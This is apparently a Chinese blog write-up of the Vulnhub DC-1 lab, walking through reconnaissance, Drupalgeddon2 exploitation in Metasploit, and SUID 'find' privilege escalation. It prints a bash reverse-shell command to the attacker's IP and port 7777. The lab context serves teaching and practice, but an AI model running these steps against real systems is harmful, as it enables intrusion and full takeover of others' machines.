[Vulnhub靶机] DC-1

Vulnhub靶机\] DC-1靶机渗透思路及方法(个人分享) **靶机下载地址:** [https://download.vulnhub.com/dc/DC-1.zip](https://download.vulnhub.com/dc/DC-1.zip "https://download.vulnhub.com/dc/DC-1.zip") *** ** * ** *** **靶机地址:192.168.67.28** **攻击机地址:192.168.67.3** *** ** * ** *** ## 一、信息收集 1.使用 arp-scan 命令扫描网段内存活的主机,以获取靶机ip地址 > arp-scan -I 指定网卡 -l ![](https://file.jishuzhan.net/article/1752303198581821441/9fbbe4dfff0952af8032ff1b20e6a992.webp) 2.使用 **nmap**工具扫描靶机开放端口、服务版本以及系统版本,得到开放端口22、80、111及其服务ssh、http、rpcbind > nmap -sV -O 靶机地址 > > -sV 探测主机服务版本 > > -O 识别主机操作系统 ![](https://file.jishuzhan.net/article/1752303198581821441/3657ca2e2927ebb13c36a87a50bb24df.webp) 3.访问网站,发现网站是Drupal网站,通过插件也可以查看出该网站是Drupal网站 > Drupal是一个免费开源的内容管理系统(CMS),它允许个人和组织轻松创建和管理各种类型的网站,包括企业网站、博客、论坛、社交网络和电子商务平台等。Drupal提供了强大的功能和灵活的架构,使得用户可以根据自己的需求定制网站。 ![](https://file.jishuzhan.net/article/1752303198581821441/1c70f92fc005d66f1c25dc1ea1018033.webp) 4.使用dirsearch工具扫描网站目录,得到多个可访问页面,但对多个网页进行访问之后没有发现能够利用到的信息 > dirsearch -u 靶机URL -i HTTP响应码 > > -u 指定目标URL > > -i 设置HTTP响应码的过滤条件 > > **200响应码是最常见的成功响应码之一,它表示请求成功完成,服务器没有发生错误,并且返回了客户端期望的结果。例如,当你在浏览器中输入一个网址,成功加载网页时,通常会收到一个200响应码。** ![](https://file.jishuzhan.net/article/1752303198581821441/565623ebc405d5cc19ae52da045f35d3.webp) 5.使用 **searchsploit**工具对 Drupal CMS框架漏洞进行查询,翻找查看有用的信息,确定存在漏洞 ![](https://file.jishuzhan.net/article/1752303198581821441/5b4083e14ed9b94d1544e80577f5ca10.webp) ## 二、漏洞利用 1.使用**msfconsole** 命令进入 Metasploit 框架的命令行界面 > msfconsole 是 Metasploit 框架的命令行界面,它提供了一个强大的工具集,用于开展渗透测试、漏洞利用和网络安全评估工作 ![](https://file.jishuzhan.net/article/1752303198581821441/cfe55c1b6877873bc4c9ff18869d2e07.webp) 2.使用**search**命令来搜索漏洞利用模块 ![](https://file.jishuzhan.net/article/1752303198581821441/0fe21167309ebcf35c08092b4ef56438.webp) 3.经过测试发现 exploit/unix/webapp/drupal_drupalgeddon2 模块可以被利用,使用**use** 命令来选择指定的漏洞利用模块 ![](https://file.jishuzhan.net/article/1752303198581821441/8b99eefc0a50fad3f20f309fb305d0df.webp) ## 三、反弹shell 1.查看需要配置的参数,并对模块参数进行配置,并再次查看配置参数进行检查(要检查好确认配置成功) > show options 查看配置参数 > > set 属性名 对参数进行配置 ![](https://file.jishuzhan.net/article/1752303198581821441/617367c50c5452e0c3ba8311bad94f03.webp) ![](https://file.jishuzhan.net/article/1752303198581821441/5a65cd572e5b5182df8198a5698a4993.webp) 2.配置完成,运行命令获取目标靶机的shell,通过命令打开交互式界面 > run或exploit 执行漏洞模块命令 > > run或exploit命令的区别: > > exploit命令用于选择并执行一个特定的漏洞利用模块。当你在Metasploit中找到了一个适合目标系统的漏洞利用模块后,你可以使用exploit命令来执行该模块,尝试利用目标系统上的漏洞。这个命令通常用于实际的攻击过程,以获取对目标系统的访问权限或控制权。 > > run命令则用于执行当前已选定的模块或脚本。在Metasploit中,可以通过一系列的操作来选择并配置一个模块,然后使用run命令来执行该模块。这个命令通常用于执行各种辅助模块、扫描模块、信息收集模块等,并非直接用于实施攻击。 ![](https://file.jishuzhan.net/article/1752303198581821441/fcc324fb4489186ef74cf5b9d5093922.webp) 3.通过**shell**命令打开交互式界面 > shell -t 打开交互式界面(在meterpreter界面执行) > > **shell -t 命令的作用是创建一个交互式的本地shell。这个命令允许用户在受感染的系统上执行命令,并与目标系统进行交互。** ![](https://file.jishuzhan.net/article/1752303198581821441/f2bd7141b0e7e598ba87ac4f0659c3b9.webp) ## 四、提权 1.使用 **find**命令寻找suid程序,发现 find 命令具有 suid 权限 > find / -perm -4000 2\>/dev/null 或 find / -perm -u=s 2\>/dev/null > > -perm 按照权限查找文件(4000、2000、1000分别表示SUID,SGID,SBIT权限,如777为普通文件最高权限,7000为特殊文件的最高权限) > > 使用find命令的时候在命令后加 2\>/dev/null 将错误结果输出重定向到/dev/null中,/dev/null是一个特殊的设备文件,其实质为空设备文件,其大小是0字节,所有人都有读写权限,而其主要作用就是将接收的一切输出给它的数据并丢弃,就像垃圾桶,也被称为位桶(bit bucket) ![](https://file.jishuzhan.net/article/1752303198581821441/59078270d7c907b0fd3976b9e409861e.webp) 2.尝试利用 **find** 命令执行 **whoami**命令,发现成功以 root 权限执行 > find \`which find\` -exec whoami \\; > > -exec 在找到的每个文件上执行指定的命令(\\;是-exec选项的一部分,表示命令结尾) > > which find 查找 find 命令的文件路径 > > \`\`在linux中可以用来执行命令,且会优先执行 ![](https://file.jishuzhan.net/article/1752303198581821441/aba9e4ad9b8289690436b81d9f073f6d.webp) 3.在攻击机使用 nc 工具开启监听 > nc -lvp 监听端口号 靶机地址 > > -l 开启监听 > > -v 显示详细输出 > > -p 指定监听端口 ![](https://file.jishuzhan.net/article/1752303198581821441/d53027ff57c98cd4c53f5d68c987fa82.webp) 4.利用**find** 命令反弹shell进行提权,成功反弹shell > find \`which find\` -exec bash -ip \>\& /dev/tcp/192.168.67.3/7777 0\>\&1 \\; > > **利用 find 命令调用 bash 进行反弹shell** > > bash -ip \>\& /dev/tcp/192.168.67.3/7777 0\>\&1 > > -i 启动一个交互式的 bash shell > > -p 以特权模式启动 bash shell > > /dev/tcp 打开这个文件就类似于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。 > > 具体可查看:[花一天时间搞懂反弹shell的命令!bash -i >\& /dev/tcp/${HOST}/${PORT} 0>\&1!-CSDN博客](https://blog.csdn.net/weixin_53306211/article/details/134094741 "花一天时间搞懂反弹shell的命令!bash -i >& /dev/tcp/${HOST}/${PORT} 0>&1!-CSDN博客") ![](https://file.jishuzhan.net/article/1752303198581821441/f6140e79d50b7127e1b40af56b7a74a7.webp) ![](https://file.jishuzhan.net/article/1752303198581821441/1e3531578efcf01cfae413f63641edcc.webp) 5.使用命令查看当前用户,发现成功提权至 root 权限 ![](https://file.jishuzhan.net/article/1752303198581821441/e865a6aa9debafbc1cfefa9f044685c9.webp)

相关推荐
币之互联万物9 小时前
AQUA爱克泳池设备入驻济南校园,以品质筑牢游泳教育安全防线
安全
Linux运维老纪12 小时前
运维之 Centos7 防火墙(CentOS 7 Firewall for Operations and Maintenance)
linux·安全·centos·云计算·运维开发·火绒
360安全应急响应中心12 小时前
基于 RAG 提升大模型安全运营效率
安全·aigc
EasyNVR12 小时前
国标GB28181视频监控平台EasyCVR保驾护航休闲娱乐“九小场所”安全运营
网络·安全
Ai野生菌12 小时前
工具介绍 | SafeLLMDeploy教程来了 保护本地LLM安全部署
网络·人工智能·安全·大模型·llm
DevSecOps选型指南13 小时前
浅谈软件成分分析 (SCA) 在企业开发安全建设中的落地思路
安全·开源治理·软件成分分析·sca·软件供应链安全工具
cjchsh13 小时前
春秋云境(CVE-2023-23752)
安全
【云轩】14 小时前
《混沌钟的RISC-V指令集重构》
网络·安全
EasyGBS14 小时前
视频设备轨迹回放平台EasyCVR打造视频智能融合新平台,驱动智慧机场迈向数字新时代
网络·人工智能·安全·音视频